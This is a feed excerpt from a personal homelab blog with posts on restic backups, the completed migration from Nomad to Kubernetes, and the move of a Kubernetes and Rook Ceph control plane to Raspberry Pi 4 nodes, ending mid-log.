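flux bootstrap git \
  --url=ssh://git@git.example.internal/homelab/fleet.git \
  --branch=main \
  --path=clusters/homelab \
  --private-key-file=./flux-deploy-key
</code></pre>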
<p>Second, I&rsquo;d like to get something like <a href="https://github.com/renovatebot/renovate">renovate</a>
going for my k8s apps. Just so I can have a list of updates with links and
everything when Homelab Service Friday rolls around.</p>
<h2 id="backups">Backups</h2>
<p>And last, as they so often are, backups. Here, again, I&rsquo;d like to improve my
metrics. Restic can produce quite a lot of them, and I&rsquo;d like to gather those.
Again, mostly because I like pretty graphs. &#x1f913;
I even started implementing something a while ago, but never finished it. It&rsquo;s
a nice combination of implementing something in Python and Homelabbing, because
I&rsquo;ll likely use the Prometheus Push Gateway.</p>
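<p>The core of that idea is small enough to sketch in shell instead of Python: pull the JSON stats out of restic, turn them into Prometheus exposition format and push them. Repository, metric names and the Push Gateway URL are all placeholders:</p>
<pre tabindex="0"><code>#!/usr/bin/env bash
# Push a few restic repository stats to the Prometheus Push Gateway.
# Assumes RESTIC_PASSWORD and the S3 credentials are already exported.
set -euo pipefail

REPO=s3:https://rgw.example.internal/restic-someservice
STATS=$(restic --repo &#34;$REPO&#34; stats --json latest)

cat &lt;&lt;METRICS | curl --data-binary @- http://pushgateway.example.internal:9091/metrics/job/restic/repo/someservice
restic_total_size_bytes $(echo &#34;$STATS&#34; | jq .total_size)
restic_total_file_count $(echo &#34;$STATS&#34; | jq .total_file_count)
METRICS
</code></pre>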
<p>The biggest issue with my backups at the moment is the complete lack of off-site
backups. My backups currently consist of a battery of S3 buckets on my Ceph
cluster, each of which holds the restic backup repository for one of my services.
Then there&rsquo;s a large external HDD onto which I rclone the most important ones
daily. The biggest problem here is that said external HDD is sitting on the
top shelf of the rack that also holds the other servers in the Homelab. So
should anything physically happen to my Homelab, that second backup location
is also going to be gone.</p>
<p>My idea is to pretty much take the content of the HDD and sync it to a Hetzner
StorageBox. Or potentially make the backups a bit more independent and sync
the important S3 buckets to Hetzner directly, so the external HDD and the off-site
backups are a bit more independent.</p>
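<p>Mechanically, either variant ends up being a single rclone call per repository. The remote names are placeholders for however the StorageBox and RGW remotes would be configured:</p>
<pre tabindex="0"><code># Variant 1: mirror the external HDD to the StorageBox over SFTP.
rclone sync /mnt/backup-hdd/restic storagebox:restic --transfers 4

# Variant 2: sync the important S3 buckets on the Ceph RGW directly,
# so the off-site copy does not depend on the HDD.
rclone sync ceph-rgw:restic-someservice storagebox:restic/someservice
</code></pre>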
<h2 id="what-will-i-actually-do-next">What will I actually do next?</h2>
<p>I hope you enjoyed this tour through my Homelab backlog. It was pretty nice to
write a &ldquo;stream of consciousness&rdquo; post like this, as compared to my normal
tutorial/here-is-what-I-did-and-why posts.</p>
<p>The last remaining question: What will I actually do next in the Homelab?
First step is going to be deploying the three Pi 5 with NVMe currently still
strewn all over my table. Once that&rsquo;s done, next will very likely be the Thanos
deployment. I&rsquo;m getting a bit tired of regularly increasing the Prometheus PVC&rsquo;s size.</p>
<p>And then, the next big project will very likely be the baremetal deployment
enhancement. I got myself a bit excited while writing about digging into the
Pi bootloader and trying to get it to chainload an iPXE.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Final: It&#39;s done</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-final/</link>
      <pubDate>Thu, 24 Apr 2025 13:40:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-final/</guid>
      <description>The migration is complete.</description>
      <content:encoded><![CDATA[<p>Wherein I try to draw a conclusion about my migration to k8s.</p>
<p>This is the final part of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>After a total of 26 posts, this will be the last one in the migration series.
On the evening of April 13th, after one year, three months and 26 days, I set the
final task of my k8s migration plan to &ldquo;Done&rdquo;. I made the first commits for the
migration on December 19th 2023, shortly after starting my Christmas vacation
that year. It was the addition of the first VMs, for the control plane nodes.
I already did some experimentation in November, but I don&rsquo;t count that as time
spent on the migration.</p>
<p>Overall, I had defined 864 tasks for the migration, most of them during the
initial planning phase.</p>
<p>Apropos planning phase: How did that turn out? In my <a href="https://blog.mei-home.net/posts/k8s-migration-0-plan/">first migration post</a>, I laid out in detail how I planned to proceed. And for the most part,
I did follow that plan. The one thing I did not foresee was that k8s does not have
a combined CronJob+DaemonSet kind of workload, meaning a run-to-completion workload
that can be started on a schedule with an instance running on every machine.
That was what I was doing with my backups in Nomad. But it wasn&rsquo;t possible
in Kubernetes. This led me to the decision to put the migration on hold and
implement my very own Kubernetes operator for orchestrating my backups.
Besides that sidetracking, most things went according to plan, except for the very
last step, <a href="https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/">migrating the controllers</a>.
In short, the Pi 4 with USB-attached SSDs were too slow to handle the control
plane. This will be remedied with some Pi 5 with attached NVMe SSDs next week,
but I didn&rsquo;t see any reason to postpone this post.</p>
<h2 id="nomad-vs-k8s">Nomad VS k8s</h2>
<p>Let&rsquo;s take a closer look at Nomad vs k8s. Starting with the number of allocations
I had in the Nomad cluster vs the number of Pods I have in the k8s cluster.
The two are not exactly comparable, but at least approximately.</p>
<p>In the Nomad cluster, shortly before starting the migration in December,
I had <strong>57</strong> allocations, while I currently have <strong>193</strong> running Pods in the
k8s cluster. This is of course partially because I&rsquo;m running more things in the
k8s cluster than I ran in the Nomad cluster. For example, each host already has
one more Pod than the Nomad hosts had allocations due to the Cilium Pod.</p>
<p>One big topic I&rsquo;d like to call out is the comparative maturity of the ecosystems,
meaning &ldquo;how much ready-made stuff is available?&rdquo;. For sure, the comparison is
slightly unfair - Kubernetes runs on all of the large cloud providers, it is
a full Linux foundation project, is used in many public and private clouds.
Nomad, on the other hand, is only supported and mainly developed by a single
company. As far as I&rsquo;m aware, there is no public offering for running Nomad
as a service for customers to run their own workloads on it. It&rsquo;s used in private
cloud deployments only, for the most part.</p>
<p>Take, as an example, Ceph. With <a href="https://rook.io/">Rook Ceph</a>, there is a very
good package for deploying a Ceph cluster into a Kubernetes cluster. There is no
such way in Nomad, at least to my knowledge. You can still deploy Ceph baremetal
and then use the official Ceph CSI driver in Nomad to control volumes, of course.
But that&rsquo;s not the same as a good piece of software allowing me to run the entire
cluster inside Nomad.</p>
<p>Then there&rsquo;s just the sheer generic support for tools of all stripes. For example
stuff like external-secrets or external-dns. Sure, Nomad has direct, and very good
support for Vault. But that&rsquo;s not even close to the level of support for secret
providers that external-secrets provides.</p>
<p>And finally, there&rsquo;s Helm. Again as far as I know, Nomad doesn&rsquo;t have anything
similar that&rsquo;s equally widely used. At the beginning, I was a bit hesitant
to use ready-made charts. Instead, I wanted to write all of them myself. I relented pretty
quickly, at least for the Helm charts which were provided by the projects
themselves. So I&rsquo;m fine with using e.g. Gitea&rsquo;s chart, because it was at least
supported by the Gitea project. But I wouldn&rsquo;t use a Gitea chart from a third
party, because the project itself will make its release announcements for the
methods they officially support, not for third party Helm charts. So for each
tool, I would have to read two release notes - the ones from the app itself,
and the one for the Helm chart. Sure, I also need to do that for first party
charts, but at least there I can be reasonably sure that they got all the necessary
adaptations correct.
In Nomad, on the other hand, I wrote every single job and volume file myself.
This definitely fostered a better understanding of both the app I wanted to
deploy and Nomad, but it does get a bit repetitive at some point.</p>
<h2 id="ceph-rook">Ceph Rook</h2>
<p>I would like to concentrate a bit on Rook Ceph here. One thing I would like to
highlight is that it worked really nicely for me, and I was able to reason
pretty well about what the operator would do - for the most part. See the mishap
with the controller migration for an example of how I completely screwed up
and almost lost my storage cluster.</p>
<p>But what I&rsquo;m still not certain about: Would I have been quite as comfortable with
Rook Ceph if I hadn&rsquo;t been running Ceph baremetal for a couple of years beforehand?
I have been brooding about this question since I added the point to the notes
for this blog post. But I got nowhere. I&rsquo;d like to be the kind of person who
can spew forth some nugget of wisdom, but I&rsquo;m starting to get the feeling that
I don&rsquo;t really have that much to say about the migration&hellip;</p>
<p>One thing I did get surprised about was the sheer number of auxiliary Pods
Rook puts up. In total, the operator namespace runs 41 Pods in my cluster, and
the cluster namespace runs another 28. I actually ended up considerably reducing
the resource requests for several Pod types, because after setting up Rook,
I pretty much ran out of resources on my initial small cluster.</p>
<h2 id="resource-utilization">Resource utilization</h2>
<p>So what does the comparison of the resource consumption look like? I haven&rsquo;t
been able to come up with something general that makes sense - there&rsquo;s more things
running now, due to stuff like external-secrets or external-dns for example,
which Nomad simply did not have. Overall, I&rsquo;m happy to report that I&rsquo;ve now got
more resources available for workloads, due to the simple reason that I&rsquo;ve got
the Ceph hosts as part of the cluster as well. And that allows me to use any free
resources on them as well.</p>
<p>One thing we can look at is the control plane nodes, because those are basically
doing the same thing in both clusters.
Under Nomad, those nodes were running the control plane
for the cluster, meaning one of each of these:</p>
<ul>
<li>Nomad server</li>
<li>Consul server</li>
<li>Vault server</li>
<li>Ceph MON daemon</li>
</ul>
<p>And it&rsquo;s basically the same in the k8s cluster control plane:</p>
<ul>
<li>kube-apiserver</li>
<li>kube-controller-manager</li>
<li>kube-scheduler</li>
<li>kube-vip</li>
<li>Ceph MON daemon</li>
<li>Vault Pod</li>
</ul>
<p>Here are the CPU loads. As a reminder, the machine we&rsquo;re talking about here is
a Raspberry Pi 4 4GB, with a SATA SSD attached via USB.
The load on an average day in 2023, before any k8s migrations, looked like this:</p>
<p><figure>
    <img loading="lazy" src="cpu-control-plane-2023.png"
         alt="A screenshot of a Grafana time series plot. It shows the CPU usage in percent for the different CPU states on a Linux system. The system, over the entire day, shows about 88% idle. Further around 6 percent is system load, with the remaining 6% being user load. A couple of spikes for IOWAIT load down to about 40% utilization are visible."/> <figcaption>
            <p>CPU utilization by CPU state on one of my Pi 4 control plane nodes on an average day before the k8s migration.</p>
        </figcaption>
</figure>

As you can see, the load is somewhere around 88% idle, with only a few IOWAIT
spikes down to only 60% idle.
Next is the same host, but from yesterday, now running the k8s control plane:
<figure>
    <img loading="lazy" src="cpu-load-control-plane-2025.png"
         alt="A screenshot of a Grafana time series plot. It shows the CPU usage in percent for the different CPU states on a Linux system. The system, over the entire day, shows about 76% idle, again with a number of IOWAIT spikes, this time deep down to less than 30% idle CPU. The usage is again split equally between Sys and User state. But in contrast to the previous graph, there&#39;s now also a visible bit of about 1% to 2% IOWAIT during the entire day."/> <figcaption>
            <p>CPU utilization by CPU state on one of my Pi 4 control plane nodes on an average day after the k8s migration.</p>
        </figcaption>
</figure>

Here the difference becomes clear - the k8s control plane needs about 10% more
CPU in total. In addition, there&rsquo;s now a clearly visible, constant 1% to 2%
IOWAIT during the entire day.</p>
<p>I believe the majority of this difference is not due to the k8s control plane
being inherently less efficient. Instead I think it&rsquo;s entirely due to operators.
In the Nomad cluster, the only requests made to the control plane were the ones
kicked off by me entering some command, and the normal chatter between the cluster
servers and the clients on the workers.
But in the k8s cluster, I&rsquo;ve got a number of operators running which all use
the k8s API, and hence need to make apiserver requests and ultimately etcd requests.
Just off the top of my head:</p>
<ul>
<li>The Prometheus operator, probably running at least a watch on a number of resources</li>
<li>The Cilium operator and the Cilium per-node Pods, which definitely contribute
to the load</li>
<li>The Rook operator, which needs to keep track of all the Ceph daemon deployments
as well as PersistentVolumeClaims</li>
<li>Traefik, which has to keep tabs on Ingresses as well as its own resources</li>
<li>External DNS and external secrets</li>
<li>My own backup operator</li>
<li>CloudNativePG, again with a number of deployments and own CRDs it needs to keep
an eye on</li>
</ul>
<p>I believe that all of these taken together put quite some load on the apiserver,
and hence on etcd. And that in turn might be too much for the USB-attached SSDs
on my control plane nodes. In contrast, the Nomad/Consul servers did not get
this many requests all the time.</p>
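<p>That theory is at least checkable, because the apiserver exports request counters. A rough sketch of how to see who is doing all the chattering:</p>
<pre tabindex="0"><code># Raw counters straight from the apiserver:
kubectl get --raw /metrics | grep ^apiserver_request_total | head

# Or as a PromQL query, to see the request rate per resource and verb:
# sum by (resource, verb) (rate(apiserver_request_total[5m]))
</code></pre>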
<h2 id="going-incremental">Going incremental</h2>
<p>The decision to do the migration slowly, with some extra capacity to run the
two clusters side by side was an unquestionable positive. Sure, it cost a bit
more due to the increased electricity consumption, but I think it was worth it.</p>
<p>Going incrementally mostly afforded me one thing: The ability to do things
properly right from the start. It allowed me time to start with the Rook cluster,
instead of first migrating to k8s and then migrating the baremetal Ceph cluster
to Rook. It left me the time to write extensive notes and to write blog posts
on any interesting pieces of the migration.</p>
<p>In addition, the experimental phase I did before even starting the migration
was also a good idea in hindsight. It allowed me to get some basic setup going,
especially exploring <a href="https://github.com/helmfile/helmfile">Helmfile</a>. I promise,
I will be writing a post about that at some point as well. &#x1f642;
One thing though: I wish I had dug a bit deeper into the backups. I did have the
backup setup on the agenda, but for some reason I saw the CronJob and decided
that that did everything I needed. I only realized that that didn&rsquo;t do what I
needed when I actually got to the implementation of the k8s backups. It would
have been nicer to write the backup operator up front, instead of in the middle
of the migration.
Because running two of everything in parallel - Nomad/Consul next to k8s, and baremetal Ceph next to Rook Ceph - was not actually that much fun.</p>
<h2 id="advantages-gained">Advantages gained</h2>
<p>I&rsquo;ve gained quite some advantages for my Homelab from the migration to k8s,
apart from the original goal of moving away from HashiCorp&rsquo;s tooling.
The first thing I&rsquo;d like to mention is how much I enjoy Kubernetes as &ldquo;platform&rdquo;.
I&rsquo;ve now got a lot more things running on a common platform - Kubernetes - than
I had before. My individual hosts contain a lot less configuration. It&rsquo;s basically
just the kubelet now, where before I needed Nomad and Consul agents which needed
to be manually configured, including generating tokens for each individual host.</p>
<p>In that same vein, I also like the fact that both Vault and Ceph are now running
in Kubernetes instead of individually. Don&rsquo;t get me wrong, it doesn&rsquo;t reduce
the maintenance for both that much, but I still got to remove quite some Ansible
code.</p>
<p>Another big one was virtual IPs. With my Nomad cluster, I had an &ldquo;Ingress&rdquo; host
which ran things like FluentD and Traefik which machines from outside the cluster
needed to access. And that host was fixed, it had all the firewall configured
and so on. When that host was down, access to my Homelab services was down. But
back then, I didn&rsquo;t see any other way. Although I could probably have done
something with e.g. HAproxy or the like?
But with my k8s cluster, I no longer have that problem. I&rsquo;m using Cilium&rsquo;s
BGP LoadBalancer functionality to provide routes to my different services with
a virtual IP. So for example my Traefik ingress can now be deployed wherever,
and Cilium would update the routes when the host changed.</p>
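<p>From the workload&rsquo;s point of view, that just means asking for a LoadBalancer Service and letting Cilium hand out the virtual IP and announce it via BGP. A minimal sketch with made-up names:</p>
<pre tabindex="0"><code>kubectl apply -f - &lt;&lt;EOF
apiVersion: v1
kind: Service
metadata:
  name: traefik
  namespace: ingress
spec:
  type: LoadBalancer
  selector:
    app: traefik
  ports:
    - name: websecure
      port: 443
      targetPort: 8443
EOF
</code></pre>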
<p>Another one in the &ldquo;quite nice&rdquo; category is that I finally got rid of Docker
in my Homelab. The daemon was just annoying me from time to time. For example
there was a memory leak in the FluentD logging driver for several months a couple
of years ago. I&rsquo;m now running cri-o as the CRI for
Kubernetes, and it just feels a lot better. One of the big advantages is that I
can configure pull-through caches not just for DockerHub, but any registry,
without having to muck around with image locations in manifests or Helm charts.</p>
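<p>For reference, that configuration lives in the containers <code>registries.conf</code> on each node and looks roughly like this - the cache host is a placeholder:</p>
<pre tabindex="0"><code># Drop-in on every node running cri-o; any registry can get a mirror,
# not just docker.io.
cat &lt;&lt;EOF &gt; /etc/containers/registries.conf.d/mirrors.conf
[[registry]]
prefix = &#34;docker.io&#34;
location = &#34;docker.io&#34;

[[registry.mirror]]
location = &#34;registry-cache.example.internal/dockerhub&#34;
EOF
</code></pre>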
<p>And the final advantage is that I&rsquo;ve now got more things which I can control
with versioned code. This is especially visible in Ceph. Here, I can now create
S3 buckets via the ObjectBucketClaim instead of doing it manually on the command
line. The same goes for example for Ceph users or even CephFS volumes. And
the Rook team is continually improving the Ceph API support too, for example
with the addition of bucket policies for the ObjectBucketClaim.</p>
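<p>An ObjectBucketClaim is pleasantly short. This sketch assumes an object store StorageClass called <code>ceph-bucket</code>; the names are placeholders:</p>
<pre tabindex="0"><code>kubectl apply -f - &lt;&lt;EOF
apiVersion: objectbucket.io/v1alpha1
kind: ObjectBucketClaim
metadata:
  name: someservice-backup
  namespace: someservice
spec:
  generateBucketName: someservice-backup
  storageClassName: ceph-bucket
EOF
</code></pre>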
<h2 id="conclusion">Conclusion</h2>
<p>I had fun. That&rsquo;s really all there is to it, in the end, right? The best decision
of the entire migration was to make it so I could do it incrementally. I never
had any longer downtimes of any of the services in the Homelab I rely on. That
in turn meant that I could do it at my own pace. If I didn&rsquo;t feel like homelabbing
on a weekend, I didn&rsquo;t need to. The Homelab was always in a stable state I could
leave it at. It was interesting to dive into this new (to me) technology and
kick the tires, and I like what I ended up with.</p>
<p>The only two things which could have gone better were the backup situation for one,
and the performance/stability problems with the control plane for another.
It would have been more comfortable to have implemented the backup operator at
the beginning, instead of interrupting the migration for a couple of months.</p>
<p>So what&rsquo;s next? I will be starting another blog post right after this one where
I detail some of the larger ideas I&rsquo;ve got in mind. It would bloat this post a
bit too much to detail them here.</p>
<p>But short-term, I will work on replacing my control plane nodes with Pi 5 with
NVMe SSDs to hopefully fix the instability issues they&rsquo;re currently suffering
from. The last piece of hardware I was waiting for arrived today, and I will
likely get to it next week, as there&rsquo;s another long weekend in Germany. And then
I will get stuck into all the small and medium sized tasks that I&rsquo;ve been
postponing for the past 1.5 years. For example migrating to Forgejo from Gitea,
adding SSO support to some more services, cleaning up my log parsing and adding
some more services.</p>
<p>Finally, I&rsquo;ve greatly enjoyed accompanying the migration with this series of
blog posts. One thing I&rsquo;ve learned is that it is easier and more fun to write
a post about something when doing it right after the thing is done, instead of
putting the post on an ever-growing pile of posts to write at some point in
the future.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 25: Control Plane Migration</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/</link>
      <pubDate>Wed, 09 Apr 2025 23:47:45 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/</guid>
      <description>Migrating my control plane to my Pi 4 hosts.</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my control plane to the Raspberry Pi 4 nodes it is intended
to run on.</p>
<p>This is part 26 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This one did not remotely go as well as I thought. Initially, I wasn&rsquo;t even
sure that this was going to be worth a blog post. But my own impatience and
the slowly aging Pi 4 conspired to ensure I&rsquo;ve got something to write about.</p>
<p>But let&rsquo;s start with where we are. This is very likely the penultimate post
of this series. By the time I&rsquo;m writing this, the migration is done:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>task proj:homelab.k8s.migration stats
</span></span><span style="display:flex;"><span>Category                   Data
</span></span><span style="display:flex;"><span>Pending                    <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>Waiting                    <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>Recurring                  <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>Completed                  <span style="color:#ae81ff">808</span>
</span></span><span style="display:flex;"><span>Deleted                    <span style="color:#ae81ff">48</span>
</span></span><span style="display:flex;"><span>Total                      <span style="color:#ae81ff">864</span>
</span></span></code></pre></div><p>Those last eight remaining tasks are just some cleanup. But at the beginning
of the weekend, I still had one major thing to do: Migrating my control plane
from the three virtual machines it has been living on for over a year to the
three Raspberry Pi 4 4GB with attached SATA SSDs which have been serving as my
control plane before.</p>
<p>Control plane here means the k8s control plane, consisting of etcd, the
kube-apiserver, the kube-controller-manager and the kube-scheduler. In addition,
I had kube-vip running to provide a virtual IP for the k8s API. And the MONs of
my Rook Ceph cluster were running on there as well. And finally my Vault instances
are also assigned to those nodes.</p>
<p>While the kube control plane components probably don&rsquo;t need any explanation,
the other pieces do. Let&rsquo;s start with the Ceph MONs. Why put them here, instead
of on the Ceph nodes themselves? Mostly habit - it was the setup I had previously.
Originally born from the thought that I might be running my Ceph nodes on Pi 4
as well. And on those hosts, memory would have been at a premium. I ended up not
going with that idea, but I still liked the thought of having control plane
nodes which run the servers/controller components of all my major services.
In the Nomad cluster setup, these nodes were running the Consul, Vault and
Nomad servers as well as the Ceph MONs. I liked that setup and decided to keep
it for the k8s setup. I couldn&rsquo;t run the MONs on any worker nodes, because none
of those have local storage. They all have their root disks on Ceph RBDs, which
means they could only run the MONs for that same Ceph cluster until the first
time they all went down at the same time. &#x1f609;</p>
<p>The reason for running Vault on the control plane nodes is one of convenience.
I&rsquo;ve got some automation for regular node updates. But my Vault instances need
manual unsealing. This means that after the reboot as part of the regular update,
I would need to manually unseal the instance on the host which was just updated.
This is fine in the current setup - the controllers are the first nodes to be
updated anyway, so I just need to pay attention right at the beginning of the
node update playbook. And after those nodes have been restarted and their Vault
instances have been unsealed, I can go and do something else.</p>
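<p>The manual step itself is just the unseal command against the freshly restarted Pod, pasting in a key share from my password manager. Pod and namespace names here are placeholders:</p>
<pre tabindex="0"><code># Prompts for one unseal key share.
kubectl exec -it -n vault vault-0 -- vault operator unseal
</code></pre>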
<p>So I needed to migrate the kube control plane and the MONs over to the Pis. I
would need to do the following steps:</p>
<ol>
<li>Setup Kubernetes on the three Pi 4</li>
<li>Join the three Pi 4 to the kube control plane</li>
<li>Add MONs on the three new nodes, for a total of 6 Ceph MONs</li>
<li>Add the new MONs to the MON lists and reboot everything</li>
<li>Remove the old control plane nodes</li>
</ol>
<p>The most complicated step here was the MON migration. That&rsquo;s due to the fact
that the MONs are generally configured via their IPs, so I had to change some
configuration. Specifically the configs outside the k8s cluster needed manual
adaption, and the most important config here was the MON list used by my
netbooting hosts to get their root disks. Just to make sure everything was okay,
I needed to reboot all netbooting hosts in my Homelab.</p>
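<p>The authoritative list of MON addresses that those hardcoded configs need can always be pulled from the MON map, for example via the Rook toolbox (the toolbox deployment name depends on the setup):</p>
<pre tabindex="0"><code>kubectl exec -n rook-cluster deploy/rook-ceph-tools -- ceph mon dump
</code></pre>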
<p>In preparation for the move, I fixed the MON deployments for Ceph to the existing
control plane nodes, to make sure that they were only migrated when I told them
to migrate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp3&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span></code></pre></div><h2 id="migrating-the-k8s-control-plane">Migrating the k8s control plane</h2>
<p>This was reasonably easy to accomplish. I just needed to join the three Pi 4
into the cluster as control plane nodes.</p>
<p>But here I hit my first stumbling block. While most components - nominally
including the Cilium Pod - came up, the Fluentbit Pod for log collection did
not. Instead, on both hosts, it showed errors like these:</p>
<pre tabindex="0"><code>[2025/04/10 22:16:59] [ info] [filter:kubernetes:kubernetes.0] local POD info OK
[2025/04/10 22:16:59] [ info] [filter:kubernetes:kubernetes.0] testing connectivity with API server...
[2025/04/10 22:17:09] [error] [net] connection #60 timeout after 10 seconds to: kubernetes.default.svc:443
[2025/04/10 22:17:09] [error] [filter:kubernetes:kubernetes.0] kube api upstream connection error
[2025/04/10 22:17:09] [ warn] [filter:kubernetes:kubernetes.0] could not get meta for POD fluentbit-fluent-bit-ls6tt
</code></pre><p>After some fruitless research, I found this line in the logs of the Cilium Pods
of the new control plane hosts:</p>
<pre tabindex="0"><code>Failed to initialize datapath, retrying later&#34; module=agent.datapath.orchestrator error=&#34;failed to delete xfrm policies on node configuration changed: protocol not supported&#34; retry-delay=10s
</code></pre><p>This brought me to the <a href="https://docs.cilium.io/en/stable/operations/system_requirements/#ubuntu-22-04-on-raspberry-pi">Cilium system requirements docs</a>.
And there it states pretty clearly that for the exact Ubuntu version I&rsquo;m running,
an additional package with kernel modules was needed. I didn&rsquo;t have any issues
with my Pi 4 worker nodes before, though. This was because those already had
the <code>linux-modules-extra-raspi</code> package installed, as that&rsquo;s needed for Ceph
support, and all of my worker nodes use Ceph RBDs for their root disks.
But the controller nodes never needed that, due to having local storage.</p>
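<p>The fix itself is a one-liner per node, plus a reboot to make sure the freshly installed modules actually get picked up:</p>
<pre tabindex="0"><code>sudo apt install linux-modules-extra-raspi
sudo reboot
</code></pre>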
<p>After installing the additional package, the new nodes worked properly. What I
found a bit disappointing was that the Cilium Pods did not show any indication
that anything was wrong, besides that single log line I showed above.</p>
<p>Another interesting sign that something was wrong was that I saw entries like
these in my firewall logs:</p>
<pre tabindex="0"><code>HomelabInterface		2025-04-11T00:34:59	300.300.300.4:39696	310.310.17.198:4240	tcp	Block all local access
HomelabInterface		2025-04-11T00:34:54	300.300.300.5:42022	310.310.19.209:2020	tcp	Block all local access
</code></pre><p>Which is odd, because the <code>310.310.0.0/16</code> CIDR subnet is my Pod subnet, and
those packets should really never show up at my firewall.</p>
<p>With that, my k8s control plane was up and running without further issue.</p>
<h2 id="how-not-to-migrate-mons">How not to migrate MONs</h2>
<p>Do not follow the steps in this section. I will speculate a bit on what I did
wrong, but I do not have another cluster to migrate to confirm what the right
way would be.</p>
<p><strong>This section is a cautionary tale, not a guide.</strong></p>
<p>So let&rsquo;s set the table. At the beginning of this, I had three MON daemons running
on the three old control plane nodes. Everything was fine. I planned to start
with replacing two old MONs with two new ones, leaving the one old MON available
to the netbooting hosts with their old configuration.</p>
<p>So I started out with just replacing two of the old nodes with two new ones in
the placement config for the MONs in the Rook Ceph cluster <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp2&#34;</span>
</span></span></code></pre></div><p>Deploying this did not work. This left the two MONs for <code>newcp1</code> and <code>newcp2</code>
in pending state, because the one remaining MON was too few. I then tried to
increase the number of MONs to five, with the three old nodes and the two new
ones. That brought my heart to a standstill with this message showing up in the
Rook operator&rsquo;s logs:</p>
<pre tabindex="0"><code>2025-04-12 10:31:16.256775 I | ceph-spec: ceph-object-store-user-controller: CephCluster &#34;k8s-rook&#34; found but skipping reconcile since ceph health is &amp;{Health:HEALTH_ERR Details:map[error:{Severity:Urgent Message:failed to get status. . [...]/src/mon/MonMap.h: In function &#39;void MonMap::add(const mon_i
nfo_t&amp;)&#39; thread 7f8ea6f2c640 time 2025-04-12T10:29:53.668780+0000
